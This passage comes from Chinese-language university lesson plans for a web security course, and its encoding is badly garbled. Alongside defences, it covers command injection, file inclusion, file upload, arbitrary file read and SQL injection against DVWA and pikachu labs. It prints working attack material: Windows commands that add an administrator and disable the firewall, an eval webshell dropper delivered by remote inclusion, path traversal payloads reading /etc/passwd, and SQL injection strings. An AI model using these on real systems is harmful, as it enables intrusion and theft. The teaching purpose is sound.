ǎng)站沒(méi)有對(duì)用戶提交的參數(shù)進(jìn)行有效的檢測(cè)過(guò)濾(2)操作系統(tǒng)允許一條語(yǔ)句執(zhí)行多條命令(使用連接符和管道符)2.3常見(jiàn)連接符2.4常見(jiàn)的系統(tǒng)命令—window2.6遠(yuǎn)程系統(tǒng)命令執(zhí)行漏洞利用Window中,添加管理員賬號(hào):netusertest123456/add#添加用戶testnetlocalgroupadministratorstest/add#把用戶test加入管理員組關(guān)閉防火墻:netshadvfirewallsetpublicprofilestateoff開3389端口(win7)REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d0/f3.1遠(yuǎn)程代碼執(zhí)行漏洞同樣的道理,因?yàn)樾枨笤O(shè)計(jì),后臺(tái)有時(shí)候也會(huì)把用戶的輸入作為代碼的一部分進(jìn)行執(zhí)行,也就造成了遠(yuǎn)程代碼執(zhí)行漏洞。3.2與命令執(zhí)行漏洞區(qū)別:命令執(zhí)行漏洞是直接調(diào)用操作系統(tǒng)命令代碼執(zhí)行漏洞則是依靠執(zhí)行腳本代碼調(diào)用操作系統(tǒng)命令3.3PHP執(zhí)行系統(tǒng)命令的函數(shù)(1)system()用法:system(string$command,[,int&$return_var])(2)exec()用法:exec(string$command[,array&$output[,int&$return_var]])(3)shell_exec()用法:shell_exec(string&command)3.3PHP執(zhí)行系統(tǒng)命令的函數(shù)(4)passthru()用法:passthru(string$command[,int&$return_var])(5)eval用法:eval(string$code)注:eval函數(shù)和前面四個(gè)函數(shù)的區(qū)別是不僅可以執(zhí)行系統(tǒng)命令,還可以將code參數(shù)直接當(dāng)作php代碼執(zhí)行加固方法1.盡量少用執(zhí)行命令的函數(shù)或直接禁用2.參數(shù)值盡量使用引號(hào)包括3.在進(jìn)入執(zhí)行命令函數(shù)之前,變量一定要做好過(guò)濾,對(duì)敏感字符轉(zhuǎn)義4.在使用動(dòng)態(tài)函數(shù)之前,確保使用的函數(shù)是指定的函數(shù)之一練習(xí)與作業(yè)1.利用dvwa環(huán)境,進(jìn)行命令執(zhí)行漏洞利用(1)創(chuàng)建一個(gè)用戶,并加入到管理員組(win、linux)(2)win開啟3389,遠(yuǎn)程連接(3)linux通過(guò)ssh進(jìn)行連接2.利用system函數(shù)寫一個(gè)反彈shell3.利用eval函數(shù)寫一個(gè)一句話木馬課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次10課程類型實(shí)踐項(xiàng)目(模塊)實(shí)踐5:命令執(zhí)行漏洞利用與防護(hù)教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解RCE漏洞的定義、分類2.掌握遠(yuǎn)程系統(tǒng)命令執(zhí)行漏洞利用與加固3.掌握遠(yuǎn)程代碼執(zhí)行漏洞利用與加固能力目標(biāo):1.具有利用RCE漏洞獲取系統(tǒng)權(quán)限的能力情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)掌握遠(yuǎn)程系統(tǒng)命令執(zhí)行漏洞利用教學(xué)難點(diǎn)掌握遠(yuǎn)程系統(tǒng)命令執(zhí)行漏洞加固教學(xué)方法演示法教學(xué)環(huán)境機(jī)房授課日期2021/3/29授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.利用dvwa環(huán)境,進(jìn)行命令執(zhí)行漏洞利用(1)創(chuàng)建一個(gè)用戶,并加入到管理員組(win、linux)(2)win開啟3389,遠(yuǎn)程連接(3)linux通過(guò)ssh進(jìn)行連接2.利用system函數(shù)寫一個(gè)反彈shell3.利用eval函數(shù)寫一個(gè)一句話木馬練習(xí)與作業(yè)課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次11課程類型理論項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
任務(wù)2.2文件包含漏洞教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解文件包含、文件包含漏洞定義2.理解文件包含漏洞的分類、文件包含函數(shù)3.掌握文件包含漏洞利用,防范措施能力目標(biāo):1.能運(yùn)用文件包含漏洞獲取敏感信息以及加固方法情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)文件包含漏洞利用與防御教學(xué)難點(diǎn)文件包含漏洞利用與防御教學(xué)方法演示法教學(xué)環(huán)境教學(xué)樓授課日期2021/4/12授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.1文件包含在web后臺(tái)開發(fā)中,程序員往往為了提高效率以及讓代碼看起來(lái)更加簡(jiǎn)潔,會(huì)使用包含函數(shù)功能,比如會(huì)把網(wǎng)頁(yè)引用的標(biāo)準(zhǔn)頁(yè)眉(head.php)或菜單文件寫進(jìn)一個(gè)文件中,之后某個(gè)文件需要調(diào)用的時(shí)候就直接在文件頭中寫上一句<?phpincludehead.php?>.使用文件包含為開發(fā)者節(jié)省大量的時(shí)間。--當(dāng)頁(yè)眉需要更新時(shí),您只更新一個(gè)包含文件就可以了,或者向網(wǎng)站添加一張新頁(yè)面時(shí),僅僅需要修改一下菜單文件(而不是更新所有網(wǎng)頁(yè)中的鏈接)1.2文件包含漏洞有些時(shí)候,由于網(wǎng)站功能的需求,文件包含的代碼文件被寫成了一個(gè)變量,且這個(gè)變量可以由前端用戶傳進(jìn)來(lái),由于傳入的文件名沒(méi)有合理的校驗(yàn),或者校驗(yàn)被繞過(guò),從而操作了預(yù)想之外的文件,就可能導(dǎo)致意外的文件泄露甚至惡意的代碼注入,讀取系統(tǒng)給敏感文件。1.3文件包含代碼<?php$file=$_GET[‘file’];#將參數(shù)file的值傳遞給變量$fileinclude$file;#使用include函數(shù)包含文件?>原因分析:文件包含函數(shù)加載的參數(shù)沒(méi)有經(jīng)過(guò)過(guò)濾或者嚴(yán)格的定義,可以被用戶控制,包含其他惡意文件,導(dǎo)致了執(zhí)行了非預(yù)期的代碼。1.4PHP文件包含函數(shù)大部分文件包含的漏洞都出現(xiàn)在php的程序中,因PHP語(yǔ)言提供的文件包含功能太強(qiáng)大,太靈活。(1)include():包含過(guò)程中如果出現(xiàn)錯(cuò)誤,會(huì)拋出一個(gè)警告,程序繼續(xù)正常執(zhí)行。(2)include_once():同include,只包含一次。(3)require():包含過(guò)程中如果出現(xiàn)錯(cuò)誤,會(huì)退出程序的執(zhí)行。(4)require_once():同require,只包含一次。使用與在腳本執(zhí)行期間同一個(gè)文件有可能被包括超過(guò)一次的情況下,你想確保它只被包含一次以避免函數(shù)重定義、變量重定義賦值等問(wèn)題。1.5文件包含漏洞分類根據(jù)不同的配置環(huán)境,文件包含漏洞分為如下兩種情況:(1)本地文件包含:當(dāng)被包含的文件在服務(wù)器本地(2)遠(yuǎn)程文件包含:當(dāng)被包含的文件在遠(yuǎn)程服務(wù)器遠(yuǎn)程文件包含條件:在php.ini文件中allow_url_fopen=on#默認(rèn)打開allow_url_include=on#默認(rèn)關(guān)閉1.5.1本地文件包含1.5.2遠(yuǎn)程文件包含2.1文件包含漏洞利用1.本地文件包含2.遠(yuǎn)程文件包含3.文件上傳+文件包含綜合利用2.2文件包含漏洞防御(1)在功能設(shè)計(jì)上盡量不要將文件包含函數(shù)對(duì)應(yīng)的文件放給前端進(jìn)行選擇和操作(2)過(guò)濾各種../../,http://,https://(3)配置php.ini配置文件allow_url_fopen=offallow_url_include=offmagic_quotes_gpc=on(4)通過(guò)白名單策略,僅允許包含運(yùn)行指定的文件,其他的都禁止練習(xí)與作業(yè)1.利用本地文件包含漏洞讀取目標(biāo)系統(tǒng)敏感文件2.利用文件上傳+文件包含漏洞寫入webshell課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次12課程類型實(shí)踐項(xiàng)目(模塊)實(shí)踐6:文件包含漏洞利用與防護(hù)教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解文件包含、文件包含漏洞定義2.理解文件包含漏洞的分類、文件包含函數(shù)3.掌握文件包含漏洞利用,防范措施能力目標(biāo):1.能運(yùn)用文件包含漏洞獲取敏感信息以及加固方法情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)文件包含漏洞利用與防御教學(xué)難點(diǎn)文件包含漏洞利用與防御教學(xué)方法演示法教學(xué)環(huán)境教學(xué)樓授課日期2021/4/12授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容利用pikachu平臺(tái)實(shí)踐文件包含漏洞點(diǎn)擊提交查詢按鈕以后,發(fā)現(xiàn)實(shí)際上它傳的是一個(gè)文件名到后臺(tái),后臺(tái)對(duì)指定的文件做對(duì)應(yīng)的操作,按照后臺(tái)的設(shè)計(jì),這些文件都是后臺(tái)自己存在的文件,但是由于這個(gè)文件名是由前端傳到后臺(tái)的,前端的測(cè)試人員可以去修改這個(gè)文件,比如說(shuō)可以去把file4.php修改成../../../../../etc/passwd文件,讀取敏感文件。源代碼分析$html='';
if(isset($_GET['submit'])&&$_GET['filename']!=null){
$filename=$_GET['filename'];
include"include/$filename";//變量傳進(jìn)來(lái)直接包含,沒(méi)做任何的安全限制
////安全的寫法,使用白名單,嚴(yán)格指定包含的文件名
//if($filename=='file1.php'||$filename=='file2.php'||$filename=='file3.php'||$filename=='file4.php'||$filename=='file5.php'){
//include"include/$filename";
//}
}前端提交一個(gè)文件名,后端獲取這個(gè)文件名后,通過(guò)include進(jìn)行包含,沒(méi)有對(duì)文件做任何處理。遠(yuǎn)程包含漏洞演示Step1:靶機(jī)設(shè)置滿足遠(yuǎn)程文件包含漏洞,重啟服務(wù)vi/etc/php/7.0/apache2/php.iniallow_url_fopen=Onallow_url_include=Onstep2:在攻擊機(jī)里(1)遠(yuǎn)程服務(wù)器內(nèi)容,有一個(gè)shell.txt,內(nèi)容如下<?php$a="<?phpeval(\$_POST['123'])?>";$b=fopen("caidao.php","w")ordie("123!");fwrite($b,$a);fclose($b);?>Step3:利用08/about.php?file=/shell.txt上菜刀源代碼分析//遠(yuǎn)程文件包含漏洞,需要php.ini的配置文件符合相關(guān)的配置
if(isset($_GET['submit'])&&$_GET['filename']!=null){
$filename=$_GET['filename'];
include"$filename";//變量傳進(jìn)來(lái)直接包含,沒(méi)做任何的安全限制
練習(xí)與作業(yè)課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次13課程類型理論項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
任務(wù)2.3文件上傳漏洞教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解文件上傳漏洞的概念、原因、危害2.理解文件上傳漏洞的測(cè)試流程3.掌握文件上傳漏洞的利用與防御措施能力目標(biāo):1.能夠利用文件上傳漏洞,控制web服務(wù)器情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)文件上傳漏洞利用與防御教學(xué)難點(diǎn)文件上傳漏洞利用與防御教學(xué)方法演示法教學(xué)環(huán)境教學(xué)樓授課日期2021/4/25授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.1文件上傳文件上傳功能在web應(yīng)用系統(tǒng)很常見(jiàn),因?yàn)闃I(yè)務(wù)功能需要,很多web站點(diǎn)都有文件上傳的接口,比如(1)注冊(cè)時(shí)上傳頭像圖片(jpg,png,gif等)(2)上傳文件附件(doc,xls等)當(dāng)用戶點(diǎn)擊上傳按鈕后,后臺(tái)會(huì)對(duì)上傳的文件進(jìn)行判斷比如是否是指定的類型、后綴名、大小等等,然后將其按照設(shè)計(jì)的格式進(jìn)行重命名后存儲(chǔ)在指定的目錄。1.2文件上傳漏洞在進(jìn)行文件上傳功能的時(shí)候,而在后臺(tái)對(duì)上傳的文件沒(méi)有進(jìn)行安全考慮或者采用了有缺陷的措施,導(dǎo)致攻擊者可以通過(guò)一些手段繞過(guò)安全措施從而上傳一些惡意的文件,比如一句話木馬,從而通過(guò)對(duì)該惡意文件的訪問(wèn)來(lái)控制整個(gè)web后臺(tái)。文件上傳漏洞可以說(shuō)是日常滲透測(cè)試中用得最多的一個(gè)漏洞,用它獲得服務(wù)器權(quán)限最快最直接(高危漏洞)。1.3文件上傳漏洞危害(1)上傳文件是病毒或木馬時(shí),可以誘騙用戶下載執(zhí)行或者自動(dòng)執(zhí)行。(2)上傳文件是webshell時(shí),攻擊者可通過(guò)這些網(wǎng)頁(yè)后門執(zhí)行命令(3)上傳文件是惡意圖片時(shí),圖片中可能包含了腳本,加載或者點(diǎn)擊這些圖片時(shí)腳本會(huì)執(zhí)行1.4文件上傳漏洞原因(1)文件上傳檢查不嚴(yán):沒(méi)有檢查或者客戶端檢查(2)文件上傳后修改文件名處理不當(dāng):允許已經(jīng)上傳的文件進(jìn)行重命名(3)使用第三方插件引入:例如著名的博客平臺(tái)wordpress就有豐富的插件,而這些插件中每年都會(huì)被挖掘出大量的文件上傳漏洞。1.5文件上傳漏洞測(cè)試流程(1)對(duì)文件上傳的地方按照要求上傳文件,查看返回結(jié)果(路徑,提示等);(2)嘗試上傳不同類型的“惡意文件”,比如php文件,分析結(jié)果;(3)查看html源碼,看是否通過(guò)js在前端做了上傳限制,可以繞過(guò);(4)嘗試使用不同方式進(jìn)行繞過(guò),黑白名單繞過(guò)/MIME繞過(guò)/0x00階段繞過(guò)等;(5)測(cè)試或者結(jié)合其它漏洞(比如文件包含等)得到木馬,連接測(cè)試。2.1文件上傳漏洞利用1.客戶端javascript檢測(cè)繞過(guò)2.服務(wù)端MIME類型檢測(cè)繞過(guò)3.服務(wù)端getimagesize檢測(cè)繞過(guò)4.up-lab文件上傳實(shí)驗(yàn)2.2文件上傳漏洞防御(1)不要在前端使用js實(shí)施上傳限制策略(2)通過(guò)服務(wù)端對(duì)文件上傳文件進(jìn)行限制(2.1)進(jìn)行多條件組合檢查:比如文件大小,路徑,擴(kuò)展名,文件類型,文件完整性(2.2)對(duì)上傳的文件在服務(wù)器上存儲(chǔ)時(shí)進(jìn)行重命名(制定合理的命名規(guī)則)(2.3)對(duì)服務(wù)端上傳的目錄進(jìn)行權(quán)限控制(比如只讀),限制執(zhí)行權(quán)限帶來(lái)的危害。練習(xí)與作業(yè)1.客戶端javascript檢測(cè)繞過(guò)2.服務(wù)端MIME類型檢測(cè)繞過(guò)3.服務(wù)端getimagesize檢測(cè)繞過(guò)課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次14課程類型實(shí)踐項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
任務(wù)2.3文件上傳漏洞教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解文件上傳漏洞的概念、原因、危害2.理解文件上傳漏洞的測(cè)試流程3.掌握文件上傳漏洞的利用與防御措施能力目標(biāo):1.能夠利用文件上傳漏洞,控制web服務(wù)器情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)文件上傳漏洞利用與防御教學(xué)難點(diǎn)文件上傳漏洞利用與防御教學(xué)方法演示法教學(xué)環(huán)境教學(xué)樓授課日期2021/4/25授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容實(shí)驗(yàn)環(huán)境靶機(jī):linuxIP:密碼:redhat文件上傳漏洞之客戶端js繞過(guò)源代碼分析clientcheck.php<script>
functioncheckFileExt(filename)
{
varflag=false;//狀態(tài)
vararr=["jpg","png","gif"];
//取出上傳文件的擴(kuò)展名
varindex=filename.lastIndexOf(".");
varext=filename.substr(index+1);
//比較
for(vari=0;i<arr.length;i++)
{
if(ext==arr[i])
{
flag=true;//一旦找到合適的,立即退出循環(huán)
break;
}
}
//條件判斷
if(!flag)
{
alert("上傳的文件不符合要求,請(qǐng)重新選擇!");
location.reload(true);
}
}
</script>實(shí)驗(yàn)步驟:制作一個(gè)一句話木馬1.php,并重命名為1.jgp瀏覽選擇文件1.jpg打開burpsuite工具,并設(shè)置開關(guān)為on點(diǎn)擊上傳通過(guò)burpsuite抓吧,發(fā)送到repeater修改1.jpg為1.php,點(diǎn)擊go,上傳成功burpsuite工具,并設(shè)置開關(guān)為off用菜刀連接練習(xí)與作業(yè)課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次15課程類型理論項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
任務(wù)2.4任意文件讀取教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解任意文件讀取的概念,利用條件,危害2.掌握任意文件讀取漏洞的利用3.掌握任意文件讀取漏洞加固能力目標(biāo):1.能夠利用任意文件讀取漏洞并對(duì)該漏洞進(jìn)行防御情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)文件讀取漏洞利用與防御教學(xué)難點(diǎn)文件讀取漏洞利用與防御教學(xué)方法演示法教學(xué)環(huán)境教學(xué)樓授課日期2021/4/26授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.1任意文件讀取漏洞一些網(wǎng)站由于業(yè)務(wù)需求,往往需要提供文件查看或文件下載功能,但若對(duì)用戶查看或下載的文件不做限制,則惡意用戶就能夠查看或下載任意敏感文件,這就是任意文件讀取漏洞。1.2漏洞危害(1)下載服務(wù)器任意文件,如腳本代碼、服務(wù)及系統(tǒng)配置文件等(2)可用得到的代碼進(jìn)一步代碼審計(jì),得到更多可利用漏洞1.3漏洞利用條件(1)存在讀文件的函數(shù)(2)讀取文件的路徑用戶可控且未校驗(yàn)或校驗(yàn)不嚴(yán)(3)輸出了文件內(nèi)容1.4PHP任意讀取文件函數(shù)file_get_contents()fopen()readfile
fread
fgets
fgetss
fpassthru
parse_ini_file2.1漏洞利用1.利用任意文件讀取漏洞下載/etc/passwd敏感文件2.2漏洞加固1.對(duì)傳入的文件名進(jìn)行嚴(yán)格的過(guò)濾和限定2.對(duì)文件下載的目錄進(jìn)行嚴(yán)格的限定練習(xí)與作業(yè)1.讀取Linux系統(tǒng)敏感文件課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次16課程類型實(shí)踐項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
任務(wù)2.4任意文件讀取教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解任意文件讀取的概念,利用條件,危害2.掌握任意文件讀取漏洞的利用3.掌握任意文件讀取漏洞加固能力目標(biāo):1.能夠利用任意文件讀取漏洞并對(duì)該漏洞進(jìn)行防御情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)文件讀取漏洞利用與防御教學(xué)難點(diǎn)文件讀取漏洞利用與防御教學(xué)方法演示法教學(xué)環(huán)境機(jī)房授課日期2021/4/26授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容任意文件下載pikachu環(huán)境/pikachu/vul/unsafedownload/down_nba.php當(dāng)我們選擇一個(gè)圖片下載的時(shí)候,通過(guò)抓包軟件,實(shí)際上路徑是/pikachu/vul/unsafedownload/execdownload.php?filename=ai.png下載任意文件/pikachu/vul/unsafedownload/execdownload.php?filename=../../../inc/config.inc.php練習(xí)與作業(yè)課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次17課程類型理論項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
任務(wù)2.5SQL注入漏洞(一)教學(xué)目標(biāo)知識(shí)目標(biāo):1.了解SQL注入漏洞的基本概念、危害,分類2.理解SQL注入漏洞的測(cè)試流程、測(cè)試字符串3.掌握數(shù)據(jù)庫(kù)的基本操作4.掌握手工注入&工具注入5.掌握SQL注入漏洞的利用與加固能力目標(biāo):1.能利用SQL注入漏洞獲取目標(biāo)靶機(jī)數(shù)據(jù)情感目標(biāo):1.自主、開放的學(xué)習(xí)能力2.良好的自我表現(xiàn)、與人溝通能力3.良好的團(tuán)隊(duì)合作精神教學(xué)重點(diǎn)SQL注入測(cè)試字符串教學(xué)難點(diǎn)SQL注入測(cè)試字符串教學(xué)方法演示法教學(xué)環(huán)境機(jī)房授課日期2021/5/8授課班級(jí)19信息安全與管理教學(xué)過(guò)程設(shè)計(jì)課前準(zhǔn)備通過(guò)QQ群發(fā)布授課PPT,視頻教學(xué)內(nèi)容1.1SQL注入漏洞及形成原因定義:SQL注入即是指web應(yīng)用程序?qū)τ脩糨斎霐?shù)據(jù)的合法性沒(méi)有判斷,攻擊者可以在web應(yīng)用程序中事先定義好的查詢語(yǔ)句的結(jié)尾上添加額外的SQL語(yǔ)句,以此來(lái)實(shí)現(xiàn)欺騙數(shù)據(jù)庫(kù)服務(wù)器執(zhí)行非授權(quán)的任意查詢,從而進(jìn)一步得到相應(yīng)的數(shù)據(jù)信息。原因:SQL注入漏洞主要形成的原因是在數(shù)據(jù)交互中,前端的數(shù)據(jù)傳入到后臺(tái)處理時(shí),沒(méi)有做嚴(yán)格的判斷,導(dǎo)致其傳入的“數(shù)據(jù)”拼接到SQL語(yǔ)句中后,被當(dāng)作SQL語(yǔ)句的一部分執(zhí)行。從而導(dǎo)致數(shù)據(jù)庫(kù)受損(被脫褲、被刪除、甚至整個(gè)服務(wù)器權(quán)限淪陷)。1.2SQL注入漏洞及形成原因Sql注入漏洞形成原因,主要是開發(fā)人員在構(gòu)建代碼時(shí),沒(méi)有對(duì)輸入邊界進(jìn)行安全考慮,導(dǎo)致攻擊者可以通過(guò)合法的輸入點(diǎn)提交一些精心構(gòu)造的語(yǔ)句,從而欺騙后臺(tái)數(shù)據(jù)庫(kù)對(duì)其進(jìn)行執(zhí)行,導(dǎo)致數(shù)據(jù)庫(kù)信息泄露。正常輸入:id=1select*fromproductwhereid=1非法輸入:id=1or1=1select*fromproductwhereid=1or1=11.3SQL注入漏洞危害(1)數(shù)據(jù)庫(kù)信息泄露:數(shù)據(jù)庫(kù)中存放的用戶的隱私信息的泄露(2)網(wǎng)頁(yè)篡改:通過(guò)操作數(shù)據(jù)庫(kù)對(duì)特定問(wèn)也進(jìn)行篡改(3)網(wǎng)站被掛馬,傳播惡意軟件:修改數(shù)據(jù)庫(kù)一些字段的值,進(jìn)行掛馬攻擊1.4SQL注入攻擊流程第一步:注入點(diǎn)探測(cè)自動(dòng)方式:使用web漏洞掃描工具,自動(dòng)進(jìn)行注入點(diǎn)發(fā)現(xiàn)手動(dòng)方式:手工構(gòu)造sql注入語(yǔ)句進(jìn)行注入點(diǎn)發(fā)現(xiàn)第二步:信息獲取通過(guò)注入點(diǎn)取期望得到的數(shù)據(jù)環(huán)境信息:數(shù)據(jù)庫(kù)類型,數(shù)據(jù)庫(kù)版本,操作系統(tǒng)版本,用戶信息等數(shù)據(jù)庫(kù)信息:數(shù)據(jù)庫(kù)名稱,數(shù)據(jù)庫(kù)表,表字段,字段內(nèi)容第三步:獲取權(quán)限獲取操作系統(tǒng)權(quán)限,通過(guò)數(shù)據(jù)庫(kù)執(zhí)行shell,上傳木馬1.5SQL注入測(cè)試字符串or1=1--'or1=1—xx%’or1=1--“or1=1--)or1=1--')or1=1--")or1=1--"))or1=1-$conn=mysql_connect($host,$username,$password);$query=”select*fromuserswhereuser=’admin’andpasswd=’”;$query=$query.$_GET[“passwd”]”’”;$result=mysql_query($query);#######################################################################正常的數(shù)據(jù):passwd=admin888、passwd=test123后臺(tái)所執(zhí)行的語(yǔ)句:Select*fromuserswhereuser=’admin’andpasswd=’admin888’–登陸成功Select*fromuserswhereuser=’admin’andpasswd=’test123’–登陸失敗帶有惡意代碼的數(shù)據(jù):passwd=’or1=1#此時(shí)后臺(tái)執(zhí)行語(yǔ)句為:Select*fromuserswhereuser=’admin’andpasswd=‘a(chǎn)dmin’or1=1#’–登陸成功1.6SQL注入漏洞位置(1)登陸框(2)搜索框(3)url參數(shù)值(4)信息設(shè)置只要是后臺(tái)數(shù)據(jù)庫(kù)操作的地方,都有可能有注入練習(xí)與作業(yè)萬(wàn)能密碼登陸后臺(tái)管理系統(tǒng)課后反思注:1.一次課(2課時(shí))寫一份上述格式教案,課次為授課先后次序,填1、2、3...等。2.課程類型:理論或?qū)嵺`。3.教學(xué)環(huán)境:包含場(chǎng)所(教學(xué)樓、機(jī)房、實(shí)訓(xùn)室、操場(chǎng)等)和教具(實(shí)訓(xùn)設(shè)備、教學(xué)儀器、教學(xué)模型)。4.課后反思要與相應(yīng)的授課日期、授課班級(jí)的授課實(shí)際情況相對(duì)應(yīng)。/學(xué)年第學(xué)期教案課程名稱:Web應(yīng)用安全與防護(hù)課程代碼:教務(wù)處印制課次18課程類型實(shí)踐項(xiàng)目(模塊)項(xiàng)目2:典型漏洞利用與防御
